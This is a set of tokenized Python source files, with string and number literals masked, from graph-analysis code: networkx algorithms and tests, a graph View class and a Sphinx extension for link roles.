<s> """<STR_LIT>""" <EOL> from exceptions import * <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> NAN = float ( '<STR_LIT>' ) <EOL> CIRCLE = '<STR_LIT>' <EOL> SHAPES = [ CIRCLE ] <EOL> SHAPE_DIMS = { <EOL> CIRCLE : <NUM_LIT:1> , <EOL> } <EOL> def circle_shape ( radius ) : <EOL> """<STR_LIT>""" <EOL> return ( CIRCLE , radius ) <EOL> class View : <EOL> def __init__ ( self , G , pos_array = None ) : <EOL> """<STR_LIT>""" <EOL> self . G = G <EOL> self . _pos = pos_array <EOL> self . _ncolors = { } <EOL> self . _default_ncolor = None <EOL> self . _nborders = { } <EOL> self . _default_nborder = None <EOL> self . _nshape = { } <EOL> self . _nshape_dim = { } <EOL> self . _default_nshape = CIRCLE <EOL> self . _default_nshape_dim = ( <NUM_LIT:0.1> , ) <EOL> self . _max_shape_radius = <NUM_LIT:0.1> <EOL> self . _ecolors = { } <EOL> self . _default_ecolor = None <EOL> self . _ewidths = { } <EOL> self . _default_ewidth = None <EOL> def graph ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . G <EOL> def set_shape_ ( self , nidx , shape_info ) : <EOL> """<STR_LIT>""" <EOL> if shape_info is not None : <EOL> self . __check_shape ( shape_info ) <EOL> self . _nshape [ nidx ] = shape_info <EOL> max_radius = self . __shape_radius ( shape_info [ <NUM_LIT:0> ] , shape_info [ <NUM_LIT:1> ] ) <EOL> if max_radius > self . _max_shape_radius : <EOL> self . _max_shape_radius = max_radius <EOL> else : <EOL> del self . _nshape [ nidx ] <EOL> def shape_ ( self , nidx , use_default = True ) : <EOL> """<STR_LIT>""" <EOL> if nidx not in self . _nshape : <EOL> if use_default : <EOL> return self . get_default_shape ( ) <EOL> else : <EOL> return None <EOL> else : <EOL> return self . _nshape [ nidx ] <EOL> def __check_shape ( self , shape_info ) : <EOL> shape = shape_info [ <NUM_LIT:0> ] <EOL> dim = shape_info [ <NUM_LIT:1> ] <EOL> if shape not in SHAPE_DIMS : <EOL> raise ZenException , '<STR_LIT>' % shape <EOL> if len ( dim ) != SHAPE_DIMS [ shape ] : <EOL> raise ZenException , '<STR_LIT>' % ( shape , SHAPE_DIMS [ shape ] , len ( dim ) ) <EOL> return <EOL> def __shape_radius ( self , shape , shape_dims ) : <EOL> if shape == CIRCLE : <EOL> return shape_dims [ <NUM_LIT:0> ] <EOL> else : <EOL> raise ZenException , '<STR_LIT>' % shape <EOL> def set_default_shape ( self , shape_info ) : <EOL> """<STR_LIT>""" <EOL> self . __check_shape ( shape_info ) <EOL> self . _default_nshape = shape_info [ <NUM_LIT:0> ] <EOL> self . _default_nshape_dim = shape_info [ <NUM_LIT:1> ] <EOL> max_radius = self . __shape_radius ( shape_info [ <NUM_LIT:0> ] , shape_info [ <NUM_LIT:1> ] ) <EOL> if max_radius > self . _max_shape_radius : <EOL> self . _max_shape_radius = max_radius <EOL> def get_default_shape ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _default_nshape , self . _default_nshape_dim <EOL> def has_pos_array ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _pos != None <EOL> def set_pos_array ( self , pos_array ) : <EOL> """<STR_LIT>""" <EOL> self . _pos = pos_array <EOL> def pos_array ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _pos <EOL> def max_x ( self ) : <EOL> shape_buffer = <NUM_LIT:0> <EOL> if self . _max_shape_radius is not None : <EOL> shape_buffer = self . _max_shape_radius <EOL> return max ( self . _pos [ : , <NUM_LIT:0> ] ) + shape_buffer <EOL> def max_y ( self ) : <EOL> shape_buffer = <NUM_LIT:0> <EOL> if self . _max_shape_radius is not None : <EOL> shape_buffer = self . _max_shape_radius <EOL> return max ( self . _pos [ : , <NUM_LIT:1> ] ) + shape_buffer <EOL> def min_x ( self ) : <EOL> shape_buffer = <NUM_LIT:0> <EOL> if self . _max_shape_radius is not None : <EOL> shape_buffer = self . _max_shape_radius <EOL> return min ( self . _pos [ : , <NUM_LIT:0> ] ) - shape_buffer <EOL> def min_y ( self ) : <EOL> shape_buffer = <NUM_LIT:0> <EOL> if self . _max_shape_radius is not None : <EOL> shape_buffer = self . _max_shape_radius <EOL> return min ( self . _pos [ : , <NUM_LIT:1> ] ) - shape_buffer <EOL> def pos_x_ ( self , nidx ) : <EOL> if self . _pos is None : <EOL> return NAN <EOL> else : <EOL> return self . _pos [ nidx , <NUM_LIT:0> ] <EOL> def pos_y_ ( self , nidx ) : <EOL> if self . _pos is None : <EOL> return NAN <EOL> else : <EOL> return self . _pos [ nidx , <NUM_LIT:1> ] <EOL> def pos_ ( self , nidx ) : <EOL> if self . _pos is None : <EOL> return NAN , NAN <EOL> else : <EOL> return self . _pos [ nidx , <NUM_LIT:0> ] , self . _pos [ nidx , <NUM_LIT:1> ] <EOL> def node_border_ ( self , nidx , use_default = True ) : <EOL> if nidx not in self . _nborders : <EOL> if use_default : <EOL> return self . _default_nborder <EOL> else : <EOL> return None <EOL> else : <EOL> return self . _nborders [ nidx ] <EOL> def set_node_border_ ( self , nidx , border_info ) : <EOL> if border_info is not None : <EOL> self . _nborders [ nidx ] = border_info <EOL> else : <EOL> del self . _nborders [ nidx ] <EOL> def node_color_ ( self , nidx , use_default = True ) : <EOL> """<STR_LIT>""" <EOL> if nidx not in self . _ncolors : <EOL> if use_default : <EOL> return self . _default_ncolor <EOL> else : <EOL> return None <EOL> else : <EOL> return self . _ncolors [ nidx ] <EOL> def set_node_color_ ( self , nidx , color ) : <EOL> """<STR_LIT>""" <EOL> if color is not None : <EOL> self . _ncolors [ nidx ] = color <EOL> elif nidx in self . _ncolors : <EOL> del self . _ncolors [ nidx ] <EOL> def edge_color_ ( self , eidx , use_default = True ) : <EOL> """<STR_LIT>""" <EOL> if eidx not in self . _ecolors : <EOL> if use_default : <EOL> return self . _default_ecolor <EOL> else : <EOL> return None <EOL> else : <EOL> return self . _ecolors [ eidx ] <EOL> def set_edge_color_ ( self , eidx , color ) : <EOL> """<STR_LIT>""" <EOL> if color is not None : <EOL> self . _ecolors [ eidx ] = color <EOL> elif eidx in self . _ecolors : <EOL> del self . _ecolors [ eidx ] <EOL> def edge_width_ ( self , eidx , use_default = True ) : <EOL> """<STR_LIT>""" <EOL> if eidx not in self . _ewidths : <EOL> if use_default : <EOL> return self . _default_ewidth <EOL> else : <EOL> return None <EOL> else : <EOL> return self . _ewidths [ eidx ] <EOL> def set_edge_width_ ( self , eidx , width ) : <EOL> """<STR_LIT>""" <EOL> if width is not None : <EOL> self . _ewidths [ eidx ] = width <EOL> elif eidx in self . _ewidths : <EOL> del self . _ewidths [ eidx ] <EOL> def default_node_border ( self ) : <EOL> return self . _default_nborder <EOL> def set_default_node_border ( self , border_info ) : <EOL> self . _default_nborder = border_info <EOL> def default_node_color ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _default_ncolor <EOL> def set_default_node_color ( self , color ) : <EOL> """<STR_LIT>""" <EOL> self . _default_ncolor = color <EOL> def default_edge_color ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _default_ecolor <EOL> def set_default_edge_color ( self , color ) : <EOL> """<STR_LIT>""" <EOL> self . _default_ecolor = color <EOL> def default_edge_width ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _default_ewidth <EOL> def set_default_edge_width ( self , width ) : <EOL> """<STR_LIT>""" <EOL> self . _default_ewidth = width </s>
<s> """<STR_LIT>""" <EOL> from docutils import nodes , utils <EOL> from docutils . parsers . rst import roles <EOL> from sphinx import addnodes <EOL> from sphinx . util import ws_re , caption_ref_re <EOL> def sample_role ( name , rawtext , text , lineno , inliner , options = { } , content = [ ] ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> prefixed_roles = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> } <EOL> no_text_roles = [ <EOL> '<STR_LIT:url>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> def prefixed_role ( name , rawtext , text , lineno , inliner , options = { } , content = [ ] ) : <EOL> prefix , baseuri = prefixed_roles [ name ] <EOL> uri = baseuri + text <EOL> display = utils . unescape ( text ) <EOL> node = nodes . literal ( prefix , prefix ) <EOL> ref = nodes . reference ( rawtext , display , refuri = uri , ** options ) <EOL> node += ref <EOL> return [ node ] , [ ] <EOL> def url_role ( name , rawtext , text , lineno , inliner , options = { } , content = [ ] ) : <EOL> uri = text <EOL> display = '<STR_LIT:url>' <EOL> node = nodes . literal ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> node += nodes . reference ( rawtext , name , refuri = uri , ** options ) <EOL> return [ node ] , [ ] <EOL> def trac_ticket_role ( name , rawtext , text , lineno , inliner , <EOL> options = { } , content = [ ] ) : <EOL> app = inliner . document . settings . env . app <EOL> try : <EOL> base = app . config . trac_url <EOL> if not base : <EOL> raise AttributeError <EOL> except AttributeError as err : <EOL> msg = '<STR_LIT>' <EOL> raise ValueError ( msg % str ( err ) ) <EOL> slash = '<STR_LIT:/>' if base [ - <NUM_LIT:1> ] != '<STR_LIT:/>' else '<STR_LIT>' <EOL> prefix = '<STR_LIT>' <EOL> node = nodes . literal ( prefix , prefix ) <EOL> display = utils . unescape ( text ) <EOL> uri = base + slash + '<STR_LIT>' + text <EOL> node += nodes . reference ( rawtext , display , refuri = uri , ** options ) <EOL> return [ node ] , [ ] <EOL> def trac_changeset_role ( name , rawtext , text , lineno , inliner , <EOL> options = { } , content = [ ] ) : <EOL> app = inliner . document . settings . env . app <EOL> try : <EOL> base = app . config . trac_url <EOL> if not base : <EOL> raise AttributeError <EOL> except AttributeError as err : <EOL> msg = '<STR_LIT>' <EOL> raise ValueError ( msg % str ( err ) ) <EOL> slash = '<STR_LIT:/>' if base [ - <NUM_LIT:1> ] != '<STR_LIT:/>' else '<STR_LIT>' <EOL> unescaped = utils . unescape ( text ) <EOL> prefix = '<STR_LIT>' <EOL> node = nodes . literal ( prefix , prefix ) <EOL> if unescaped . endswith ( '<STR_LIT>' ) : <EOL> display = unescaped . split ( '<STR_LIT:/>' ) [ <NUM_LIT:0> ] <EOL> else : <EOL> display = unescaped [ : <NUM_LIT:12> ] <EOL> uri = base + slash + '<STR_LIT>' + text <EOL> node += nodes . reference ( rawtext , display , refuri = uri , ** options ) <EOL> return [ node ] , [ ] <EOL> active_roles = { <EOL> '<STR_LIT>' : prefixed_role , <EOL> '<STR_LIT>' : prefixed_role , <EOL> '<STR_LIT>' : url_role , <EOL> '<STR_LIT:url>' : url_role , <EOL> '<STR_LIT>' : trac_ticket_role , <EOL> '<STR_LIT>' : trac_changeset_role , <EOL> } <EOL> for role in active_roles . values ( ) : <EOL> role . __doc__ = sample_role . __doc__ <EOL> def setup ( app ) : <EOL> for role , func in active_roles . items ( ) : <EOL> roles . register_local_role ( role , func ) <EOL> app . add_config_value ( '<STR_LIT>' , None , '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> import matplotlib . pyplot as plt <EOL> except : <EOL> raise <EOL> import networkx as nx <EOL> G = nx . path_graph ( <NUM_LIT:8> ) <EOL> nx . draw ( G ) <EOL> plt . savefig ( "<STR_LIT>" ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> import itertools <EOL> import collections <EOL> import networkx as nx <EOL> from networkx . exception import NetworkXError <EOL> from networkx . utils import not_implemented_for <EOL> from networkx . algorithms . approximation import local_node_connectivity <EOL> from networkx . algorithms . connectivity import local_node_connectivity as exact_local_node_connectivity <EOL> from networkx . algorithms . connectivity import build_auxiliary_node_connectivity <EOL> from networkx . algorithms . flow import build_residual_network <EOL> __author__ = """<STR_LIT:\n>""" . join ( [ '<STR_LIT>' ] ) <EOL> __all__ = [ '<STR_LIT>' ] <EOL> not_implemented_for ( '<STR_LIT>' ) <EOL> def k_components ( G , min_density = <NUM_LIT> ) : <EOL> r"""<STR_LIT>""" <EOL> k_components = collections . defaultdict ( list ) <EOL> node_connectivity = local_node_connectivity <EOL> k_core = nx . k_core <EOL> core_number = nx . core_number <EOL> biconnected_components = nx . biconnected_components <EOL> density = nx . density <EOL> combinations = itertools . combinations <EOL> for component in nx . connected_components ( G ) : <EOL> comp = set ( component ) <EOL> if len ( comp ) > <NUM_LIT:1> : <EOL> k_components [ <NUM_LIT:1> ] . append ( comp ) <EOL> for bicomponent in nx . biconnected_components ( G ) : <EOL> bicomp = set ( bicomponent ) <EOL> if len ( bicomp ) > <NUM_LIT:2> : <EOL> k_components [ <NUM_LIT:2> ] . append ( bicomp ) <EOL> g_cnumber = core_number ( G ) <EOL> max_core = max ( g_cnumber . values ( ) ) <EOL> for k in range ( <NUM_LIT:3> , max_core + <NUM_LIT:1> ) : <EOL> C = k_core ( G , k , core_number = g_cnumber ) <EOL> for nodes in biconnected_components ( C ) : <EOL> if len ( nodes ) < k : <EOL> continue <EOL> SG = G . subgraph ( nodes ) <EOL> H = _AntiGraph ( ) <EOL> H . add_nodes_from ( SG . nodes ( ) ) <EOL> for u , v in combinations ( SG , <NUM_LIT:2> ) : <EOL> K = node_connectivity ( SG , u , v , cutoff = k ) <EOL> if k > K : <EOL> H . add_edge ( u , v ) <EOL> for h_nodes in biconnected_components ( H ) : <EOL> if len ( h_nodes ) <= k : <EOL> continue <EOL> SH = H . subgraph ( h_nodes ) <EOL> for Gc in _cliques_heuristic ( SG , SH , k , min_density ) : <EOL> for k_nodes in biconnected_components ( Gc ) : <EOL> Gk = nx . k_core ( SG . subgraph ( k_nodes ) , k ) <EOL> if len ( Gk ) <= k : <EOL> continue <EOL> k_components [ k ] . append ( set ( Gk ) ) <EOL> return k_components <EOL> def _cliques_heuristic ( G , H , k , min_density ) : <EOL> h_cnumber = nx . core_number ( H ) <EOL> for i , c_value in enumerate ( sorted ( set ( h_cnumber . values ( ) ) , reverse = True ) ) : <EOL> cands = set ( n for n , c in h_cnumber . items ( ) if c == c_value ) <EOL> if i == <NUM_LIT:0> : <EOL> overlap = False <EOL> else : <EOL> overlap = set . intersection ( * [ <EOL> set ( x for x in H [ n ] if x not in cands ) <EOL> for n in cands ] ) <EOL> if overlap and len ( overlap ) < k : <EOL> SH = H . subgraph ( cands | overlap ) <EOL> else : <EOL> SH = H . subgraph ( cands ) <EOL> sh_cnumber = nx . core_number ( SH ) <EOL> SG = nx . k_core ( G . subgraph ( SH ) , k ) <EOL> while not ( _same ( sh_cnumber ) and nx . density ( SH ) >= min_density ) : <EOL> SH = H . subgraph ( SG ) <EOL> if len ( SH ) <= k : <EOL> break <EOL> sh_cnumber = nx . core_number ( SH ) <EOL> sh_deg = dict ( SH . degree ( ) ) <EOL> min_deg = min ( sh_deg . values ( ) ) <EOL> SH . remove_nodes_from ( n for n , d in sh_deg . items ( ) if d == min_deg ) <EOL> SG = nx . k_core ( G . subgraph ( SH ) , k ) <EOL> else : <EOL> yield SG <EOL> def _same ( measure , tol = <NUM_LIT:0> ) : <EOL> vals = set ( measure . values ( ) ) <EOL> if ( max ( vals ) - min ( vals ) ) <= tol : <EOL> return True <EOL> return False <EOL> class _AntiGraph ( nx . Graph ) : <EOL> """<STR_LIT>""" <EOL> all_edge_dict = { '<STR_LIT>' : <NUM_LIT:1> } <EOL> def single_edge_dict ( self ) : <EOL> return self . all_edge_dict <EOL> edge_attr_dict_factory = single_edge_dict <EOL> def __getitem__ ( self , n ) : <EOL> """<STR_LIT>""" <EOL> all_edge_dict = self . all_edge_dict <EOL> return dict ( ( node , all_edge_dict ) for node in <EOL> set ( self . adj ) - set ( self . adj [ n ] ) - set ( [ n ] ) ) <EOL> def neighbors ( self , n ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return iter ( set ( self . adj ) - set ( self . adj [ n ] ) - set ( [ n ] ) ) <EOL> except KeyError : <EOL> raise NetworkXError ( "<STR_LIT>" % ( n , ) ) <EOL> def degree ( self , nbunch = None , weight = None ) : <EOL> """<STR_LIT>""" <EOL> if nbunch in self : <EOL> nbrs = { v : self . all_edge_dict for v in set ( self . adj ) - set ( self . adj [ nbunch ] ) - set ( [ nbunch ] ) } <EOL> if weight is None : <EOL> return len ( nbrs ) + ( nbunch in nbrs ) <EOL> return sum ( ( nbrs [ nbr ] . get ( weight , <NUM_LIT:1> ) for nbr in nbrs ) ) + ( nbunch in nbrs and nbrs [ nbunch ] . get ( weight , <NUM_LIT:1> ) ) <EOL> if nbunch is None : <EOL> nodes_nbrs = ( ( n , { v : self . all_edge_dict for v in <EOL> set ( self . adj ) - set ( self . adj [ n ] ) - set ( [ n ] ) } ) <EOL> for n in self . nodes ( ) ) <EOL> else : <EOL> nodes_nbrs = ( ( n , { v : self . all_edge_dict for v in <EOL> set ( self . nodes ( ) ) - set ( self . adj [ n ] ) - set ( [ n ] ) } ) <EOL> for n in self . nbunch_iter ( nbunch ) ) <EOL> if weight is None : <EOL> def d_iter ( ) : <EOL> for n , nbrs in nodes_nbrs : <EOL> yield ( n , len ( nbrs ) + ( n in nbrs ) ) <EOL> else : <EOL> def d_iter ( ) : <EOL> for n , nbrs in nodes_nbrs : <EOL> yield ( n , sum ( ( nbrs [ nbr ] . get ( weight , <NUM_LIT:1> ) for nbr in nbrs ) ) + <EOL> ( n in nbrs and nbrs [ n ] . get ( weight , <NUM_LIT:1> ) ) ) <EOL> return d_iter ( ) <EOL> def adjacency ( self ) : <EOL> """<STR_LIT>""" <EOL> for n in self . adj : <EOL> yield ( n , set ( self . adj ) - set ( self . adj [ n ] ) - set ( [ n ] ) ) </s>
<s> """<STR_LIT>""" <EOL> import itertools <EOL> import networkx as nx <EOL> from nose . tools import assert_true <EOL> from networkx . algorithms . bipartite . matching import eppstein_matching <EOL> from networkx . algorithms . bipartite . matching import hopcroft_karp_matching <EOL> from networkx . algorithms . bipartite . matching import maximum_matching <EOL> from networkx . algorithms . bipartite . matching import to_vertex_cover <EOL> class TestMatching ( ) : <EOL> """<STR_LIT>""" <EOL> def setup ( self ) : <EOL> """<STR_LIT>""" <EOL> edges = [ ( <NUM_LIT:0> , <NUM_LIT:7> ) , ( <NUM_LIT:0> , <NUM_LIT:8> ) , ( <NUM_LIT:2> , <NUM_LIT:6> ) , ( <NUM_LIT:2> , <NUM_LIT:9> ) , ( <NUM_LIT:3> , <NUM_LIT:8> ) , ( <NUM_LIT:4> , <NUM_LIT:8> ) , ( <NUM_LIT:4> , <NUM_LIT:9> ) , <EOL> ( <NUM_LIT:5> , <NUM_LIT:11> ) ] <EOL> self . graph = nx . Graph ( ) <EOL> self . graph . add_nodes_from ( range ( <NUM_LIT:12> ) ) <EOL> self . graph . add_edges_from ( edges ) <EOL> def check_match ( self , matching ) : <EOL> """<STR_LIT>""" <EOL> M = matching <EOL> matched_vertices = frozenset ( itertools . chain ( * M . items ( ) ) ) <EOL> assert matched_vertices == frozenset ( range ( <NUM_LIT:12> ) ) - { <NUM_LIT:1> , <NUM_LIT:10> } <EOL> assert all ( u == M [ M [ u ] ] for u in range ( <NUM_LIT:12> ) if u in M ) <EOL> def check_vertex_cover ( self , vertices ) : <EOL> """<STR_LIT>""" <EOL> assert len ( vertices ) == <NUM_LIT:5> <EOL> for ( u , v ) in self . graph . edges ( ) : <EOL> assert u in vertices or v in vertices <EOL> def test_eppstein_matching ( self ) : <EOL> """<STR_LIT>""" <EOL> self . check_match ( eppstein_matching ( self . graph ) ) <EOL> def test_hopcroft_karp_matching ( self ) : <EOL> """<STR_LIT>""" <EOL> self . check_match ( hopcroft_karp_matching ( self . graph ) ) <EOL> def test_to_vertex_cover ( self ) : <EOL> """<STR_LIT>""" <EOL> matching = maximum_matching ( self . graph ) <EOL> vertex_cover = to_vertex_cover ( self . graph , matching ) <EOL> self . check_vertex_cover ( vertex_cover ) <EOL> def test_eppstein_matching ( ) : <EOL> """<STR_LIT>""" <EOL> G = nx . Graph ( ) <EOL> G . add_nodes_from ( [ '<STR_LIT:a>' , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , bipartite = <NUM_LIT:0> ) <EOL> G . add_nodes_from ( [ <NUM_LIT:1> , '<STR_LIT:b>' , '<STR_LIT:c>' ] , bipartite = <NUM_LIT:1> ) <EOL> G . add_edges_from ( [ ( '<STR_LIT:a>' , <NUM_LIT:1> ) , ( '<STR_LIT:a>' , '<STR_LIT:b>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) , <EOL> ( <NUM_LIT:2> , '<STR_LIT:c>' ) , ( <NUM_LIT:3> , '<STR_LIT:c>' ) , ( <NUM_LIT:4> , <NUM_LIT:1> ) ] ) <EOL> matching = eppstein_matching ( G ) <EOL> assert_true ( len ( matching ) == len ( maximum_matching ( G ) ) ) <EOL> assert all ( x in set ( matching . keys ( ) ) for x in set ( matching . values ( ) ) ) </s>
<s> """<STR_LIT>""" <EOL> from nose . tools import * <EOL> import networkx as nx <EOL> from networkx . algorithms . centrality import harmonic_centrality <EOL> class TestClosenessCentrality : <EOL> def setUp ( self ) : <EOL> self . P3 = nx . path_graph ( <NUM_LIT:3> ) <EOL> self . P4 = nx . path_graph ( <NUM_LIT:4> ) <EOL> self . K5 = nx . complete_graph ( <NUM_LIT:5> ) <EOL> self . C4 = nx . cycle_graph ( <NUM_LIT:4> ) <EOL> self . C5 = nx . cycle_graph ( <NUM_LIT:5> ) <EOL> self . T = nx . balanced_tree ( r = <NUM_LIT:2> , h = <NUM_LIT:2> ) <EOL> self . Gb = nx . DiGraph ( ) <EOL> self . Gb . add_edges_from ( [ ( <NUM_LIT:0> , <NUM_LIT:1> ) , ( <NUM_LIT:0> , <NUM_LIT:2> ) , ( <NUM_LIT:0> , <NUM_LIT:4> ) , ( <NUM_LIT:2> , <NUM_LIT:1> ) , <EOL> ( <NUM_LIT:2> , <NUM_LIT:3> ) , ( <NUM_LIT:4> , <NUM_LIT:3> ) ] ) <EOL> def test_p3_harmonic ( self ) : <EOL> c = harmonic_centrality ( self . P3 ) <EOL> d = { <NUM_LIT:0> : <NUM_LIT> , <EOL> <NUM_LIT:1> : <NUM_LIT:2> , <EOL> <NUM_LIT:2> : <NUM_LIT> } <EOL> for n in sorted ( self . P3 ) : <EOL> assert_almost_equal ( c [ n ] , d [ n ] , places = <NUM_LIT:3> ) <EOL> def test_p4_harmonic ( self ) : <EOL> c = harmonic_centrality ( self . P4 ) <EOL> d = { <NUM_LIT:0> : <NUM_LIT> , <EOL> <NUM_LIT:1> : <NUM_LIT> , <EOL> <NUM_LIT:2> : <NUM_LIT> , <EOL> <NUM_LIT:3> : <NUM_LIT> } <EOL> for n in sorted ( self . P4 ) : <EOL> assert_almost_equal ( c [ n ] , d [ n ] , places = <NUM_LIT:3> ) <EOL> def test_clique_complete ( self ) : <EOL> c = harmonic_centrality ( self . K5 ) <EOL> d = { <NUM_LIT:0> : <NUM_LIT:4> , <EOL> <NUM_LIT:1> : <NUM_LIT:4> , <EOL> <NUM_LIT:2> : <NUM_LIT:4> , <EOL> <NUM_LIT:3> : <NUM_LIT:4> , <EOL> <NUM_LIT:4> : <NUM_LIT:4> } <EOL> for n in sorted ( self . P3 ) : <EOL> assert_almost_equal ( c [ n ] , d [ n ] , places = <NUM_LIT:3> ) <EOL> def test_cycle_C4 ( self ) : <EOL> c = harmonic_centrality ( self . C4 ) <EOL> d = { <NUM_LIT:0> : <NUM_LIT> , <EOL> <NUM_LIT:1> : <NUM_LIT> , <EOL> <NUM_LIT:2> : <NUM_LIT> , <EOL> <NUM_LIT:3> : <NUM_LIT> , } <EOL> for n in sorted ( self . C4 ) : <EOL> assert_almost_equal ( c [ n ] , d [ n ] , places = <NUM_LIT:3> ) <EOL> def test_cycle_C5 ( self ) : <EOL> c = harmonic_centrality ( self . C5 ) <EOL> d = { <NUM_LIT:0> : <NUM_LIT:3> , <EOL> <NUM_LIT:1> : <NUM_LIT:3> , <EOL> <NUM_LIT:2> : <NUM_LIT:3> , <EOL> <NUM_LIT:3> : <NUM_LIT:3> , <EOL> <NUM_LIT:4> : <NUM_LIT:3> , <EOL> <NUM_LIT:5> : <NUM_LIT:4> } <EOL> for n in sorted ( self . C5 ) : <EOL> assert_almost_equal ( c [ n ] , d [ n ] , places = <NUM_LIT:3> ) <EOL> def test_bal_tree ( self ) : <EOL> c = harmonic_centrality ( self . T ) <EOL> d = { <NUM_LIT:0> : <NUM_LIT> , <EOL> <NUM_LIT:1> : <NUM_LIT> , <EOL> <NUM_LIT:2> : <NUM_LIT> , <EOL> <NUM_LIT:3> : <NUM_LIT> , <EOL> <NUM_LIT:4> : <NUM_LIT> , <EOL> <NUM_LIT:5> : <NUM_LIT> , <EOL> <NUM_LIT:6> : <NUM_LIT> } <EOL> for n in sorted ( self . T ) : <EOL> assert_almost_equal ( c [ n ] , d [ n ] , places = <NUM_LIT:3> ) <EOL> def test_exampleGraph ( self ) : <EOL> c = harmonic_centrality ( self . Gb ) <EOL> d = { <NUM_LIT:0> : <NUM_LIT:0> , <EOL> <NUM_LIT:1> : <NUM_LIT:2> , <EOL> <NUM_LIT:2> : <NUM_LIT:1> , <EOL> <NUM_LIT:3> : <NUM_LIT> , <EOL> <NUM_LIT:4> : <NUM_LIT:1> } <EOL> for n in sorted ( self . Gb ) : <EOL> assert_almost_equal ( c [ n ] , d [ n ] , places = <NUM_LIT:3> ) <EOL> def test_weighted_harmonic ( self ) : <EOL> XG = nx . DiGraph ( ) <EOL> XG . add_weighted_edges_from ( [ ( '<STR_LIT:a>' , '<STR_LIT:b>' , <NUM_LIT:10> ) , ( '<STR_LIT:d>' , '<STR_LIT:c>' , <NUM_LIT:5> ) , ( '<STR_LIT:a>' , '<STR_LIT:c>' , <NUM_LIT:1> ) , <EOL> ( '<STR_LIT:e>' , '<STR_LIT:f>' , <NUM_LIT:2> ) , ( '<STR_LIT:f>' , '<STR_LIT:c>' , <NUM_LIT:1> ) , ( '<STR_LIT:a>' , '<STR_LIT:f>' , <NUM_LIT:3> ) , <EOL> ] ) <EOL> c = harmonic_centrality ( XG , distance = '<STR_LIT>' ) <EOL> d = { '<STR_LIT:a>' : <NUM_LIT:0> , <EOL> '<STR_LIT:b>' : <NUM_LIT:0.1> , <EOL> '<STR_LIT:c>' : <NUM_LIT> , <EOL> '<STR_LIT:d>' : <NUM_LIT:0> , <EOL> '<STR_LIT:e>' : <NUM_LIT:0> , <EOL> '<STR_LIT:f>' : <NUM_LIT> } <EOL> for n in sorted ( XG ) : <EOL> assert_almost_equal ( c [ n ] , d [ n ] , places = <NUM_LIT:3> ) <EOL> def test_empty ( self ) : <EOL> G = nx . DiGraph ( ) <EOL> c = harmonic_centrality ( G , distance = '<STR_LIT>' ) <EOL> d = { } <EOL> assert_equal ( c , d ) <EOL> def test_singleton ( self ) : <EOL> G = nx . DiGraph ( ) <EOL> G . add_node ( <NUM_LIT:0> ) <EOL> c = harmonic_centrality ( G , distance = '<STR_LIT>' ) <EOL> d = { <NUM_LIT:0> : <NUM_LIT:0> } <EOL> assert_equal ( c , d ) </s>
<s> """<STR_LIT>""" <EOL> import networkx as nx <EOL> from networkx . utils import not_implemented_for , pairwise <EOL> __all__ = [ '<STR_LIT>' ] <EOL> @ not_implemented_for ( '<STR_LIT>' ) <EOL> def is_semiconnected ( G ) : <EOL> """<STR_LIT>""" <EOL> if len ( G ) == <NUM_LIT:0> : <EOL> raise nx . NetworkXPointlessConcept ( <EOL> '<STR_LIT>' ) <EOL> if not nx . is_weakly_connected ( G ) : <EOL> return False <EOL> G = nx . condensation ( G ) <EOL> path = nx . topological_sort ( G ) <EOL> return all ( G . has_edge ( u , v ) for u , v in pairwise ( path ) ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> from functools import reduce <EOL> import networkx as nx <EOL> from networkx . utils import not_implemented_for <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> @ not_implemented_for ( '<STR_LIT>' ) <EOL> def immediate_dominators ( G , start ) : <EOL> """<STR_LIT>""" <EOL> if start not in G : <EOL> raise nx . NetworkXError ( '<STR_LIT>' ) <EOL> idom = { start : start } <EOL> order = list ( nx . dfs_postorder_nodes ( G , start ) ) <EOL> dfn = { u : i for i , u in enumerate ( order ) } <EOL> order . pop ( ) <EOL> order . reverse ( ) <EOL> def intersect ( u , v ) : <EOL> while u != v : <EOL> while dfn [ u ] < dfn [ v ] : <EOL> u = idom [ u ] <EOL> while dfn [ u ] > dfn [ v ] : <EOL> v = idom [ v ] <EOL> return u <EOL> changed = True <EOL> while changed : <EOL> changed = False <EOL> for u in order : <EOL> new_idom = reduce ( intersect , ( v for v in G . pred [ u ] if v in idom ) ) <EOL> if u not in idom or idom [ u ] != new_idom : <EOL> idom [ u ] = new_idom <EOL> changed = True <EOL> return idom <EOL> def dominance_frontiers ( G , start ) : <EOL> """<STR_LIT>""" <EOL> idom = nx . immediate_dominators ( G , start ) <EOL> df = { u : set ( ) for u in idom } <EOL> for u in idom : <EOL> if len ( G . pred [ u ] ) >= <NUM_LIT:2> : <EOL> for v in G . pred [ u ] : <EOL> if v in idom : <EOL> while v != idom [ u ] : <EOL> df [ v ] . add ( u ) <EOL> v = idom [ v ] <EOL> return df </s>
